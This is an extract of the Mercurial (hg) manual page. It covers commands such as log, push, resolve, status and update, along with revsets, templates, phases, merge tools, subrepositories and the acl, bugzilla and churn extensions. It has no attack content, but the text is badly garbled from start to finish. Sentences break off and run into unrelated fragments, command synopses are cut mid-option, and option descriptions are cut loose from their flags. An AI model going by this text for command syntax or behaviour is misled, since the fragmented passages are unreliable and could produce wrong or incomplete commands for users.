With −−graph the revisions are shown as an ASCII art DAG with the most recent changeset at the top. 'o' is a changeset, '@' is a working directory parent, 'x' is obsolete, and '+' represents a fork where the changeset from the lines below is a parent of the 'o' merge on the same line.
log −p/−−patch may generate unexpected diff output for merge changesets, as it will only compare the merge changeset against its first parent. Also, only files different from BOTH parents will appear in files:.
for performance reasons, log FILE may omit duplicate changes made on branches and will not show removals or mode changes. To see all such changes, use the −−removed switch.
changesets with full descriptions and file lists:
hg log −v
changesets ancestral to the working directory:
hg log −f
last 10 commits on the current branch:
hg log −l 10 −b .
changesets showing all modifications of a file, including removals:
hg log −−removed file.c
all changesets that touch a directory, with diffs, excluding merges:
hg log −Mp lib/
all revision numbers that match a keyword:
hg log −k bug −−template "{rev}\n"
list available log templates:
hg log −T list
check if a given changeset is included in a tagged release:
hg log −r "a21ccf and ancestor(1.9)"
find all changesets by some user in a date range:
hg log −k alice −d "may 2008 to jul 2008"
summary of all changesets after the last tag:
hg log −r "last(tagged())::" −−template "{desc|firstline}\n"
See hg help templates for more about pre−packaged styles and specifying custom templates.
Options:
−f, −−follow
−−follow−first
only follow the first parent of merge changesets (DEPRECATED)
show revisions matching date spec
−C, −−copies
show copied files
−k,−−keyword <TEXT[+]>
do case−insensitive search for a given text
show the specified revision or revset
−−removed
include revisions where files were removed
−m, −−only−merges
show only merges (DEPRECATED)
−u,−−user <USER[+]>
revisions committed by user
−−only−branch <BRANCH[+]>
show only changesets within the given named branch (DEPRECATED)
show changesets within the given named branch
−P,−−prune <REV[+]>
do not display revision or any of its ancestors
aliases: history
manifest
output the current or given revision of the project manifest:
hg manifest [−r REV]
Print a list of version controlled files for the given revision. If no revision is given, the first parent of the working directory is used, or the null revision if no revision is checked out.
With −v, print file permissions, symlink and executable bits. With −−debug, print file revision hashes.
If option −−all is specified, the list of all files from all revisions is printed. This includes deleted and renamed files.
revision to display
list files from all revisions
merge
merge another revision into working directory:
hg merge [−P] [−f] [[−r].
−−tool can be used to specify the merge tool used for file merges. It overrides the HGMERGE environment variable and your configuration files. See hg help merge−tools −−clean . which will check out a clean copy of the original merge parent, losing all changes.
Returns 0 on success, 1 if there are unresolved files.
force a merge including outstanding changes (DEPRECATED)
revision to merge
−P, −−preview
review revisions to merge (no merge is performed)
outgoing
show changesets not found in the destination:
hg outgoing [−M] [−p] [−n] [−f] [−r REV]... [DEST]
Show changesets not found in the specified destination repository or the default push location. These are the changesets that would be pushed if a push was requested.
See pull for details of valid destination formats.:
push with −B will create it
deleted
push with −B will delete it
push will update it
push with −B will update it
From the point of view of pushing behavior, bookmarks existing only in the remote repository are treated as deleted, even if it is in fact added remotely.
Returns 0 if there are outgoing changes, 1 otherwise.
a changeset intended to be included in the destination
a specific branch you would like to push
aliases: out
parents
show the parents of the working directory or revision (DEPRECATED):
hg parents [−r REV] [FILE]
Print the working directory's parent revisions. If a revision is given via −r/−−rev, the parent of that revision will be printed. If a file argument is given, the revision in which the file was last changed (before the working directory revision or the argument to −−rev if given) is printed.
See hg summary and hg help revsets for related information.
show parents of the specified revision
paths
show aliases for remote repositories:
hg paths [NAME]
Show definition of symbolic path name NAME. If no name is given, show definition of all available names.
Option −q/−−quiet−push have a special meaning. When performing a push or pull operation, they are used as fallbacks if no location is specified on the command−line. When default−push is set, it will be used for push and default will be used for pull; otherwise default is used as the fallback for both. When cloning a repository, the clone source is written as default in .hg/hgrc. Note that default and default−push apply to all inbound (e.g. hg incoming) and outbound (e.g. hg outgoing, hg email and hg bundle) operations.
See hg help urls for more information.
phase
set or show the current phase name:
hg phase [−p|−d|−s] [−f] [−r] [REV...]
With no argument, show the phase name of the current revision(s).
With one of −p/−−public, −d/−−draft or −s/−−secret, change the phase value of the specified revisions.
Unless −f/−−force is specified, hg phase won't move changeset from a lower phase to an higher phase. Phases are ordered as follows:
public < draft < secret
Returns 0 on success, 1 if no phases were changed or some could not be changed.
(For more information about the phases concept, see hg help phases.)
Options:
−p, −−public
set changeset phase to public
−d, −−draft
set changeset phase to draft
set changeset phase to secret
allow to move boundary backward
target revision
pull
pull changes from the specified source:
hg pull [−u] [−f] [−r REV]... [−e CMD] [−−remotecmd CMD] [SOURCE]
Pull changes from a remote repository to a local one.
This finds all changes from the repository at the specified path or URL and adds them to a local repository (the current one unless −R −r X where X is the last changeset listed by hg incoming.
If SOURCE is omitted, the 'default' path will be used. See hg help urls for more information.
Returns 0 on success, 1 if an update had unresolved files.
Options:
−u, −−update
update to new branch head if changesets were pulled
run even when remote repository is unrelated
−B,−−bookmark <BOOKMARK[+]>
bookmark to pull
push
push changes to the specified destination:
hg push [−f] [−r REV]... [−e CMD] [−−rem −−new−branch if you want to allow push to create a new named branch that is not present at the destination. This allows you to only create a new branch without forcing other changes.
Extra care should be taken with the −f/−−force option, which will push all new heads on all branches, an action which will almost always cause confusion for collaborators.
If −r/−−rev is used, the specified revision and all its ancestors will be pushed to the remote repository.
If −B/−−bookmark.
force push
bookmark to push
−−new−branch
allow pushing a new branch.
−A/−−after can be used to remove only files that have already been deleted, −f/−−force can be used to force deletion, and −Af that remove never deletes files in Added [A] state from the working directory, not even if option −−force is specified.
Returns 0 on success, 1 if any warnings encountered.
record delete for missing files
remove (and delete) file even if added or modified
aliases: rm
rename
rename files; equivalent of copy + remove:
hg rename [OPTION]... SOURCE... DEST
Mark dest as copies of sources; mark sources for deletion. If dest is a directory, copies are put in that directory. If dest is a file, there can only be one source.
This command takes effect at the next commit. To undo a rename before that, see hg revert.
record a rename that has already occurred
aliases: move mv
resolve
redo merges or set/view the merge status of files:
hg resolve [OPTION]... [FILE]...
Merges with unresolved conflicts are often the result of non−interactive merging using the internal:merge configuration setting, or a command−line merge tool like diff3. The resolve command is used to manage the files involved in a merge, after hg merge has been run, and before hg commit is run (i.e. the working directory must have two parents). See hg help merge−tools for information on configuring merge tools.
The resolve command can be used in the following ways:
hg resolve [−−tool TOOL] FILE...: attempt to re−merge the specified files, discarding any previous merge attempts. Re−merging is not performed for files already marked as resolved. Use −−all/−a to select all unresolved files. −−tool can be used to specify the merge tool used for the given files. It overrides the HGMERGE environment variable and your configuration files. Previous file contents are saved with a .orig suffix.
hg resolve −m [FILE]: mark a file as having been resolved (e.g. after having manually fixed−up the files). The default is to mark all unresolved files.
hg resolve −u [FILE]...: mark a file as unresolved. The default is to mark all resolved files.
hg resolve −l: list files which had or still have conflicts. In the printed list, U = unresolved and R = resolved.
Note that Mercurial will not let you commit files with unresolved merge conflicts. You must use hg resolve −m ... before you can commit after a conflicting merge.
Returns 0 on success, 1 if any files fail a resolve attempt.
Options:
−a, −−all
select all unresolved files
−l, −−list
list state of files needing merge
−m, −−mark
mark files as resolved
−u, −−unmark
mark files as unresolved
−n, −−no−status
hide status prefix
revert
restore files to their checkout state:
hg revert [OPTION]... [−r REV] [NAME]...
To check out earlier revisions, you should use hg update REV. To cancel an uncommitted merge (and lose your changes), use hg update −−clean .. −r/−−rev or −d/−−date −−no−backup.
revert all changes when no arguments given
tipmost revision matching date
revert to the specified revision
−C, −−no−backup
do not save backup copies of files
interactively select the changes (EXPERIMENTAL)
rollback
roll back the last transaction (DANGEROUS) (DEPRECATED):
hg rollback
Please use hg commit −−amend −−force−progress pull from the repository may fail if a rollback is performed.
Returns 0 on success, 1 if no rollback data is available.
Options:
−n, −−dry−run
ignore safety measures
root
print the root (top) of the current working directory:
hg root
Print the root directory of the current repository.
serve
start stand−alone webserver:
hg serve [OPTION]...
Start a local HTTP repository browser and pull server. You can use this for ad−hoc −A/−−accesslog and −E/−−errorlog options to log to files.
To have the server choose a free port number to listen on, specify a port number of 0; in this case, the server will print the port number it uses.
Options:
−A,−−accesslog <FILE>
name of access log file to write to
−d, −−daemon
run server in background
−−daemon−pipefds <FILE>
used internally by daemon mode
−E,−−errorlog <FILE>
name of error log file to write to
−p,−−port <PORT>
port to listen on (default: 8000)
−a,−−address <ADDR>
address to listen on (default: all interfaces)
−−prefix <PREFIX>
prefix path to serve from (default: server root)
−n,−−name <NAME>
name to show in web pages (default: working directory)
−−web−conf <FILE>
name of the hgweb config file (see "hg help hgweb")
−−webdir−conf <FILE>
name of the hgweb config file (DEPRECATED)
−−pid−file <FILE>
name of file to write process ID to
−−stdio
for remote clients
−−cmdserver <MODE>
−t,−−templates <TEMPLATE>
web templates to use
template style to use
−6, −−ipv6
use IPv6 in addition to IPv4
−−certificate <FILE>
SSL certificate file
status
show changed files in the working directory:
hg status [OPTION]... [FILE]...
Show status of files in the repository. If names are given, only files that match are shown. Files that are clean or ignored or the source of a copy/move operation, are not listed unless −c/−−clean, −i/−−ignored, −C/−−copies or −A/−−all are given. Unless options described with "show only ..." are given, the options −mardu are used.
Option −q/−−quiet hides untracked (unknown and ignored) files unless explicitly requested with −u/−−unknown or −i/−−ignored. −−change option can also be used as a shortcut to list the changed files of a revision from its first parent.
The codes used to show the status of files are:
M = modified
A = added
R = removed
C = clean
! = missing (deleted by non−hg command, but still tracked)
? = not tracked
I = ignored
= origin of the previous file (with −−copies)
show changes in the working directory relative to a changeset:
hg status −−rev 9353
show changes in the working directory relative to the current directory (see hg help patterns for more information):
hg status re:
show all changes including copies in an existing changeset:
hg status −−copies −−change 9353
get a NUL separated list of added files, suitable for xargs:
hg status −an0
Options:
−A, −−all
show status of all files
−m, −−modified
show only modified files
−a, −−added
show only added files
−r, −−removed
show only removed files
−d, −−deleted
show only deleted (but tracked) files
−c, −−clean
show only files without changes
−u, −−unknown
show only unknown (not tracked) files
−i, −−ignored
show only ignored files
show source of copied files
−−rev <REV[+]>
show difference from revision
−−change <REV>
list the changed files of a revision
aliases: st
summary
summarize working directory state:
hg summary [−−remote]
This generates a brief summary of the working directory state, including parents, branch, commit status, phase and available updates.
With the −−remote option, this will check the default paths for incoming and outgoing changes. This can be time−consuming.
Options:
−−remote
check for push and pull
aliases: sum
tag
add one or more tags for the current or given revision:
hg tag [−f] [−l] [−m TEXT] [−d DATE] [−u USER] [−r −f/−−force to override.
If no revision is given, the parent of the working directory is used.
To facilitate version control, distribution, and merging of tags, they are stored as a file named ".hgtags" which is managed similarly to other project files and can be hand−edited −f/−−force to force the tag commit to be based on a non−head changeset.
Since tag names have priority over branch names during revision lookup, using an existing branch name as a tag name is discouraged.
force tag
make the tag local
revision to tag
−−remove
remove a tag
list repository tags:
hg tags
This lists both regular and local tags. When the −v/−−verbose switch is used, a third column "local" is printed for local tags.
Options:
−T,−−template <TEMPLATE>
tip
show the tip revision (DEPRECATED):
hg tip [−p] [−g].
Options:
−p, −−patch
unbundle
apply one or more changegroup files:
hg unbundle [−u] FILE...
Apply one or more compressed changegroup files generated by the bundle command.
Returns 0 on success, 1 if an update has unresolved files.
update to new branch head if changesets were unbundled
update
update working directory (or switch revisions):
hg update [−c] [−C] [−d DATE] [[−r] −c/−−check option, the working directory is checked for uncommitted changes; if none are found, the working directory is updated to the specified changeset.
The following rules apply when the working directory contains uncommitted changes:
1.
If neither −c/−−check nor −C/−−clean −c/−−check option, the update is aborted and the uncommitted changes are preserved.
3.
With the −C/−−clean option, uncommitted changes are discarded and the working directory is updated to the requested changeset.
To cancel an uncommitted merge (and lose your changes), use hg update −−clean ..
Use null as the changeset to remove the working directory (like hg clone −U).
If you want to revert just one file to an older revision, use hg revert [−r REV] NAME.
Options:
−C, −−clean
discard uncommitted changes (no backup)
−c, −−check
update across branches if no uncommitted changes
aliases: up checkout co.
version
output version and copyright information:
hg version
output version and copyright information −0600 (year assumed, time offset provided)
Dec 6 13:18 UTC (UTC and GMT are aliases for +0000)
Dec 6 (midnight)
13:18 (today assumed)
3:39 (3:39AM assumed)
3:39pm (15:39)
2006−12−06 13:18:29 (ISO 8601 format)
2006−12−6 13:18
2006−12−6
12−6
12/6
12/6/6 (Dec 6 2006)
today (midnight)
yesterday (midnight)
now − right now
Lastly, there is Mercurial's internal format:
1165411109 0 (Wed Dec 6 13:18:29 2006 UTC)
This is the internal representation format for dates. The first number is the number of seconds since the epoch (1970−01−01 00:00 UTC). The second is the offset of the local timezone, in seconds west of UTC (negative if the timezone is east of UTC).
The log command also accepts date ranges:
<DATE − at or before a given date/time
>DATE − on or after a given date/time
DATE to DATE − a date range, inclusive
−DAYS − −−git −−encoding command−line −−encodingmode command−line−separated)
May be used as the author of a commit; see HGUSER.
LOGNAME−empty one is chosen. If all of them are empty, the editor defaults to 'vi'.
PYTHONPATH
This is used by Python to find imported modules and may need to be set appropriately if this Mercurial is not installed system−wide.
gpg
commands to sign and verify changesets
hgcia
hooks for integrating with the CIA.vc notification service
pager
browse command output with an external pager
patchbomb
command to send changesets as (a series of) patch emails a common history between several working directories
shelve
save and restore changes to the working directory
strip
strip changesets and their descendants from history
transplant
command to transplant changesets from another branch
win32mbcs
allow the use of MBCS paths with problematic encodings−zA−Z0−9\x80− −−8..
portable()
File that has a portable name. (This doesn't include filenames with case collisions.) − −A "set:binary()"
Forget files that are in .hgignore but are already tracked:
hg forget "set:hgignore() and not ignored()"
Find text files that contain a string:
hg files "set:grep(magic) and not binary()"
Find C files in a non−standard encoding:
hg files "set:**.c and not encoding('UTF−8')" −−active.
NOTE: this concept is deprecated because it is too implicit. Branches should now be explicitly closed using hg commit −−close−branch −−close−branch−1 −> child relation. This graph can be visualized by graphical tools such as hg log −−graph.−modifying extensions. See hg help phases.
Experimental
Feature that may change or be removed at a later date.
Graph
See DAG and hg log −−graph.−opened−initialized repositories and repositories with no checked out revision. It is thus the parent of root changesets and the effective ancestor when merging unrelated changesets. Can be specified by the alias 'null' or by the changeset ID '000000000000'.
Parent
See 'Changeset, parent'.
Parent changeset−changes−user or global ignore files. See the ignore configuration key on the [ui] section of hg help config for details of how to configure these files.
To control Mercurial's handling of files that it manages, many commands support the −I and −X−style regular expressions.
To change the syntax used, use a line of the following form:
syntax: NAME
where NAME is one of the following:
regexp
Regular expression, Python/Perl syntax.
glob
Shell−style glob.
The chosen syntax stays in effect when parsing all patterns that follow, until another syntax is selected.
Neither glob nor regexp patterns are rooted. A glob−syntax pattern of the form *.c will match a file ending in .c in any directory, and a regexp pattern of the form \.c$ will do the same. To root a regexp pattern, start it with ^.
Subdirectories can have their own .hgignore settings by adding subinclude:path/to/subdir/.hgignore to the root .hgignore. See hg help patterns for details on subinclude: and include:. − overwritten two ways. First, if {command} contains a hyphen (−), the text before the hyphen defines the style. For example, /atom−logide −k).
The revcount query string argument defines the maximum numbers of changesets to render.
For non−searches,−by− hander.
The revcount query string argument can define the number of changesets to show information for..
The tags template is rendered.−overlapping−tools configuration section − see hgrc(5) −.
:fail
Rather than attempting to merge files that were modified on both branches, it marks them as unresolved. The resolve command must be used to resolve these conflicts.
:local
Uses the local version of files as the merged version.
:merge
Uses the internal non−interactive simple merge algorithm for merging files. It will fail if there are any conflicts and leave markers in the partially merged file. Markers will have two sections, one for each side of merge.
:merge3
Uses the internal non−interactive simple merge algorithm for merging files. It will fail if there are any conflicts and leave markers in the partially merged file. Marker will have three sections, one from each side of the merge and one for the base content.
:other
Uses the other version of files as the merged version.
:prompt
Asks the user which of the local or the other version to keep as the merged version.
:tagmerge
Uses the internal tag merge algorithm (experimental).
Internal tools are always available and do not require a GUI but will by default not handle symlinks or binary files.
Choosing a merge tool
Mercurial uses these rules when deciding which merge tool to use:
If a tool has been specified with the −−tool option to merge or resolve, it is used. If it is the name of a tool in the merge−tools−patterns−tools configuration section, the one with the highest priority is used.
6.
If a program named hgmerge can be found on the system, it is used − but it will by default not be used for symlinks and binary files.
7.
If the file to be merged is not binary and is not a symlink, then internal :merge is used.
8.
The merge of the file fails and must be resolved before commit.−tools−style extended glob patterns.
Alternate pattern notations must be specified explicitly. −I or −X −v phase for examples.
Phases and servers
Normally, all servers are publishing by default. This means:
− all draft changesets that are pulled or cloned appear in phase
public on the client
− all draft changesets that are pushed appear as public on both
client and server
− secret changesets are neither pushed, pulled, or cloned
Pulling a draft changeset from a publishing server does not mark it as public on the server side due to the read−only nature of pull.
Sometimes it may be desirable to push and pull changesets in the draft phase to share unfinished work. This can be done by setting a repository to disable publishing in its configuration file:
[phases]
publish = False
Servers running older versions of Mercurial are treated as publishing. −r "not public()"
change all secret changesets to draft:
hg phase −−draft "secret()"
forcibly move the current changeset and descendants from public to draft:
hg phase −−force −−draft .
show a list of changeset revision and phase:
hg log −−template "{rev} {phase}\n"
resynchronize draft changesets relative to a remote repository:
hg phase −fd "outgoing(URL)"
See hg help phase for more information on manually manipulating phases.
Mercurial supports several ways to specify individual revisions.
A plain integer is treated as a revision number. Negative integers are treated as sequential offsets from the tip, with −1 denoting the tip, −2 denoting the revision prior to the tip, and so forth.
A 40−digit hexadecimal string is treated as a unique revision identifier.
A hexadecimal string less than 40 characters long is treated as a unique revision identifier and is referred to as a short−form identifier. A short−form identifier is only valid if it is the prefix of exactly one full−length identifier.
Any other string is treated as a bookmark, tag, or branch name. A bookmark is a movable pointer to a revision. A tag is a permanent name associated with a revision. A branch name denotes the tipmost open branch head of that branch − − or if they match one of the predefined predicates..
The union of changesets in x and y. There are two alternative short forms: x | y−public and non−obsolete changesets can be bumped.
bundle()
Changesets in the bundle.
Bundle must be specified by the −R−insensitive.−level filelog, rather than filtering through all changesets (much faster, but doesn't include deletes or duplicate changes). For a slower, more accurate result, use file().
If some linkrev points to revisions filtered by the current repoview, we'll work around it to return a non−filtered value.
first(set, [n])
An alias for limit().
follow([file])
An alias for ::. (ancestors of the working directory's first parent). If a filename is specified, the history of the given file is followed, including copies.
Like keyword(string) but accepts a regex. Use grep(r'...') to ensure special escape characters are handled correctly. Unlike keyword(string), the match is case−sensitive.
head()
Changeset is a named branch head.
heads(set)
Members of set with no children in set.
hidden()
Hidden changesets.
id(string)
Revision non−ambiguously specified by the given hex string prefix.
keyword(string)
Search commit message, user name, and names of changed files for string. The match is case−insensitive..
named(namespace)
The changesets in a given namespace.
If namespace starts with re:, the remainder of the string is treated as a regular expression. To match a namespace that actually starts with re:, use the prefix literal:.> − ::[, [−]key...])
Sort set by keys. The default sort order is ascending, specify a key as −key to sort in descending order.
The keys can be:
rev for the revision number,
branch for the branch name,
desc for the commit message (description),
user for user name (author can be used as an alias),
date for the commit date−obsolete changesets with obsolete ancestors.
user(string)
User name contains string. The match is case−insensitive.)).:
−f −> ::.
−d x −> date(x)
−k x −> keyword(x)
−m −> merge()
−u x −> user(x)
−b x −> branch(x)
−P x −> !::x
−l x −> limit(expr, x)
Changesets on the default branch:
hg log −r "branch(default)"
Changesets on the default branch since tag 1.5 (excluding merges):
hg log −r "branch(default) and 1.5:: and not merge()"
Open branch heads:
hg log −r "head() and not closed()"
Changesets between tags 1.3 and 1.5 mentioning "bug" that affect hgext/*:
hg log −r "1.3::1.5 and keyword(bug) and file('hgext/*')"
Changesets committed in May 2008, sorted by user:
hg log −r "sort(date('May 2008'), user)"
Changesets mentioning "bug" or "issue" that are not in a tagged release:
hg log −r "(keyword(bug) or keyword(issue)) and not ancestors(tag())"−readable.
If you need to invoke several hg processes in short order and/or performance is important to you, use of a server−based−8" is a good choice on UNIX−like environments.
If not set, Mercurial will inherit config options from config files using the process described in hg help config. This includes inheriting user or system−wide −T/−−template argument. For more, see hg help templates.
Templates are useful for explicitly controlling output so that you get exactly the data you want formatted how you want it. For example, log −T {node}\n can be used to print a newline delimited list of changeset nodes instead of a human−tailored output containing authors, dates, descriptions, etc.
If parsing raw command output is too complicated, consider using templates to make your life easier.
The −T/−−template argument allows specifying pre−defined styles. Mercurial ships with the machine−readable styles json and xml, which provide JSON and XML output, respectively. These are useful for producing output that is machine readable as−is.
Important
The json and xml styles are considered experimental. While they may be attractive to use for easily obtaining machine−readable. −T json). Adding −v/−−verbose and −−debug −e share for more.:
Nested repository checkouts. They can appear anywhere in the parent working directory.−level changeset. This is so developers always get a consistent set of compatible code and libraries when they update.
Thus, updating subrepos is a manual process. Simply check out target subrepo at the desired revision, test in the top−level −S/−−subrepos is specified. However, if you specify the full path of a file in a subrepo, it will be added even without −S/−−subrepos specified. Subversion subrepositories are currently silently ignored.
addremove
addremove does not recurse into subrepos unless −S/−−subrepos is specified. However, if you specify the full path of a directory in a subrepo, addremove will be performed on it even without −S/−−subrepos being specified. Git and Subversion subrepositories will print a warning and continue.
archive
archive does not recurse in subrepositories unless −S/−−subrepos is specified.
cat
cat currently only handles exact file matches in subrepos. Subversion subrepositories are currently ignored. −S/−−subrepos, or setting "ui.commitsubrepos=True" in a configuration file (see hg help config). After there are no longer any modified subrepositories, it records their state and finally commits it in the parent repository. The −−addremove option also honors the −S/−−subrepos option. However, Git and Subversion subrepositories will print a warning and abort.
diff
diff does not recurse in subrepos unless −S/−−subrepos is specified. Changes are displayed as usual, on the subrepositories elements. Subversion subrepositories are currently silently ignored.
files does not recurse into subrepos unless −S/−−subrepos is specified. However, if you specify the full path of a file or directory in a subrepo, it will be displayed even without −S/−−sub −S/−−subrepos is specified. Git and Subversion subrepositories are currently silently ignored.
outgoing
outgoing does not recurse in subrepos unless −S/−−subrepos is specified. Git and Subversion subrepositories are currently silently ignored.−level repositories. Push is a no−op for Subversion subrepositories.
status
status does not recurse into subrepositories unless −S/−−subrepos is specified. Subrepository changes are displayed as regular Mercurial changes on the subrepository elements. Subversion subrepositories are currently silently ignored.
remove
remove does not recurse into subrepositories unless −S/−−subrepos is specified. However, if you specify a file or directory path in a subrepo, it will be removed even without −S/−−sub or select an existing template−style from the command line, via the −−template option.
You can customize output for any "log−like" command: log, outgoing, incoming, tip, parents, and heads.
Some built−in styles are packaged with Mercurial. These can be listed with hg log −−template list. Example usage:
$ hg log −r1.0::1.1 −−template changelog
A template is a piece of text, with markup to invoke variable expansion:
$ hg log −r1 −−template "−like command:
activebookmark
String. The active bookmark, if it is associated with the changeset
author
String. The unmodified author of the changeset./−removed −−copied switch is set.
file_dels
List of strings. Files removed by this changeset.
file_mods
List of strings. Files modified by this changeset.
List of strings. All files modified, added, or removed by this changeset.
latesttag
List of strings. The global tags on the most recent globally tagged ancestor−local revision number of the changeset's first parent, or −1 if the changeset has no parents.
p2node
String. The identification hash of the changeset's second parent, as a 40 digit hexadecimal string. If the changeset has no second parent, all digits are 0.
p2rev
Integer. The repository−local revision number of the changeset's second parent, or −1−local changeset revision number.
subrepos
List of strings. Updated subrepositories in the changeset.
List of strings. Any tags associated with the changeset.
The "date" keyword does not produce human−readable output. If you want to use a date in your output, you can use a filter to process it. Filters are functions which return a string based on the input variable. Be sure to use the stringify filter first when you're applying a string−input filter to a list−like input variable. You can also use a chain of filters to get the desired output:
$ hg tip −−template "{date|isodate}\n"
2008−08−21 18:22 +0000
List of filters:
addbreaks
Any text. Add an XHTML "<br />" tag before the end of every line except the last.
age
Date. Returns a human−readable".
count
List or text. Returns the length as an integer.
Date. Returns a date in a Unix date format, including the timezone: "Mon Sep 04 15:13:13 2006 0700".
domain
Any text. Finds the first string that looks like an email address, and extracts just the domain component. Example: User <user AT example DOT com> becomes example.com.
Any text. Extracts the first string that looks like an email address. Example: User <user AT example DOT com> becomes user AT example DOT−08−18 13:00 +0200".
isodatesec
Date. Returns the date in ISO 8601 format, including seconds: "2009−08−18 13:00:13 +0200". See also the rfc3339date filter.
localdate
Date. Converts a date to local date.−08−18−character representing the status (G: good, B: bad, S: skipped, U: untested, I: ignored). Returns single space if text is not a valid bisection status.
shortdate
Date. Returns a date like "2006−09−18".
splitlines
Any text. Split text into a list of lines.
stringify
Any type. Turns the value into text by converting values into text and concatenating them.
Any text. Strips all leading and trailing whitespace.
stripdir
Treat the text as path and strip a directory level, if possible. For example, "foo" and "foo/bar" becomes "foo".
tabindent
Any text. Returns the text, with every non−empty−in functions:
date(date[, fmt])
Format a date. See hg help dates for formatting strings.
diff([includepattern [, excludepattern]])
Show a diff, optionally specifying files to include or exclude.
fill(text[, width[, initialident[, hangindent]]])
Fill many paragraphs with optional indentation. See the "fill" filter.
get(dict, key)
Get an attribute/key from an object. Some keywords are complex types. This function allows you to obtain the value of an attribute on these type.
if(expr, then[, else])
Conditionally execute based on the result of an expression.
ifcontains(search, thing, then[, else])
Conditionally execute based on whether the item "search" is in "thing".
ifeq(expr1, expr2, then[, else])
Conditionally execute based on whether 2 items are equivalent.
indent(text, indentchars[, firstline])
Indents all non−empty−processing, such as automatic colorization.
pad(text, width[, fillchar=' '[, right=False]])
Pad text with a fill character.
revset(query[, formatargs...])
Execute a revision set query. See hg help revset.
rstdoc(text, style)
Format ReStructuredText.
shortest(node, minlength=4)
Obtain the shortest representation of a node.
startswith(pattern, text)
Returns the value from the "text" argument if it begins with the content from the "pattern" argument.
strip(text[, chars])
Strip characters from a string.
sub(pattern, replacement, expression)
Perform text substitution using regular expressions.
word(number, text[, separator])
Return the nth word from a string.
Also, for any expression that returns a list, there is a list operator:
expr % "{template}"
As seen in the above example, "{template}" is interpreted as a template. To prevent it from being interpreted, you can use an escape character "{" or a raw string prefix, "r'...'".
Some sample command line templates:
Format lists, e.g. files:
$ hg log −r 0 −−template "files:\n{files % ' {file}\n'}"
Join the list of files with a ", ":
$ hg log −r 0 −−template "files: {join(files, ', ')}\n"
Modify each line of a commit description:
$ hg log −−template "{splitlines(desc) % '**** {line}\n'}"
Format date:
$ hg log −r 0 −−template "{date(date, '%Y')}\n"
Output the description set to a fill−width of 30:
$ hg log −r 0 −−template "{fill(desc, 30)}"
Use a conditional to test for the default branch:
$ hg log −r 0 −−template "{ifeq(branch, 'default', 'on the main branch',
'on branch {branch}')}\n"
Append a newline if not empty:
$ hg tip −−template "{if(author, '{author}\n')}"
Label the output for use with the color extension:
$ hg log −r 0 −−template "{label('changeset.{phase}', node|short)}\n"
Invert the firstline filter, i.e. everything but the first line:
$ hg log −r 0 −−template "{sub(r'^.*\n?\n?', '', desc)}\n"
Display the contents of the 'extra' field, one per line:
$ hg log −r 0 −−template "{join(extras, '\n')}\n"
Mark the active bookmark with '*':
$ hg log −−template "{bookmarks % '{bookmark}{ifeq(bookmark, active, '*')} '}\n"
Mark the working copy parent with '@':
$ hg log −−template "{ifcontains(rev, revset('.'), '@')}\n"
Show only commit descriptions that start with "template":
$ hg log −−template "{startswith('template', firstline(desc))}\n"
Print the first word of each line of a commit message:
$ hg log −−template "{word(0, −−bundle). −C" as your ssh command in your configuration file or with the −−ssh− and pull−like commands (including incoming and outgoing).
default−push:
The push command will look for a path named 'default−push',−value pairs.
Branch−based Access Control
Use the acl.deny.branches and acl.allow.branches sections to have branch−based access control. Keys in these sections can be either:
a branch name, or
an asterisk, to match any branch;
The corresponding values can be either:
a comma−separated list containing users and groups, or
an asterisk, to match anyone;
You can add the "!" prefix to a user or group name to invert the sense of the match.
Path−based Access Control
Use the acl.deny and acl.allow sections to have path−based−like−branch = *
# A bad user is denied on all branches:
* = bad−user
[acl.allow.branches]
# A few users are allowed on branch−a:
branch−a = user−1, user−2, user−3
# Only one user is allowed on branch−b:
branch−b = user−1
# The super user is allowed on any branch:
* = super−user
# Everyone is allowed on branch−for−tests:
branch−for−tests = *
−denied" will not have write access to any file:
** = @hg−denied
# Nobody will be able to change "DONT−TOUCH−THIS.txt", despite
# everyone being able to change all other files. See below.
src/main/resources/DONT−TOUCH−THIS−denied" −
view the recent repository events:
hg blackbox [OPTION]...
view the recent repository events
Options:
−l,−−limit <VALUE>−project with a strip of 2 gives a value for {webroot} of my−project..
Username to use to access MySQL server. Default bugs. −Tzilla]
bzurl=−project.org/bugzilla
user=bugmail@my−project.org
password=plugh
version=xmlrpc
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\n
{desc}\n
strip=5
[web]
baseurl=−project.org/hg
XMLRPC+email comments are sent to the Bugzilla email address bugzilla@my−project.org.
[bugzilla]
bzurl=−project.org/bugzilla
user=bugmail@my−project.org
password=plugh
version=xmlrpc+email
bzemail=bugzilla@my−project.org
MySQL example configuration. This has a local Bugzilla 3.2 installation in /opt/bugzilla−3−project.org/hg.
[bugzilla]
host=localhost
password=XYZZY
version=3.0
bzuser=unknown AT domain DOT com
bzdir=/opt/bugzilla−3.2
All the above add a comment to the Bugzilla bug record of the form:
Changeset 3b16791d6642 in repository−name.−project.org/hg/repository−name/rev/3b16791d6642, crytographic.
Commands
censor
hg censor −r REV [−t TEXT] [FILE]
censor file from specified revision
−t,−−tombstone <TEXT>
replacement tombstone data
children
command to display child changesets (DEPRECATED)
This extension is deprecated. You should use hg log −r "children(REV)" instead.
Commands
children
show the children of the given or working directory revision:
hg children [−r REV] [FILE]
Print the children of the working directory's revisions. If a revision is given via −r/−−rev, the children of that revision will be printed. If a file argument is given, revision in which the file was last changed (after the working directory revision or the argument to −−rev if given) is printed.
show children of the specified revision
churn
command to display statistics about repository history
Commands
churn
histogram of changes to the repository:
hg churn [−d DATE] [−r REV] [−−aliases FILE] [FILE]
This command will display a histogram representing the number of changed lines or revisions, grouped according to the given template. The default template will group changes by author. The −−dateformat option may be used to group the results by date instead.
Statistics are based on the number of changed lines, or alternatively the number of matching revisions if the −−changesets option is specified.
# display count of changed lines for every committer
hg churn −t "{author|email}"
# display daily activity graph
hg churn −f "%H" −s −c
# display activity of developers by month
hg churn −f "%Y−%m" −s −c
# display count of lines changed in every year
hg churn −f "%Y" −s
It is possible to map alternate email addresses to a main address by providing a file using the following format:
<alias email> = <actual email>
Such a file may be specified with the −−aliases option, otherwise a .hgchurn file will be looked for in the working directory root. Aliases will be split from the rightmost "=".
count rate for the specified revision or revset
count rate for revisions matching date spec
−t,−−oldtemplate <TEMPLATE>
template to group changesets (DEPRECATED)
template to group changesets (default: {author|email})
−f,−−dateformat <FORMAT>
strftime−compatible format for grouping by date
−c, −−changesets
count rate by number of changesets
−s, −−sort
sort by key (default: sort by count)
−−diffstat
display added/removed lines separately
−−aliases <FILE>
file with email aliases
color
colorize output from some commands
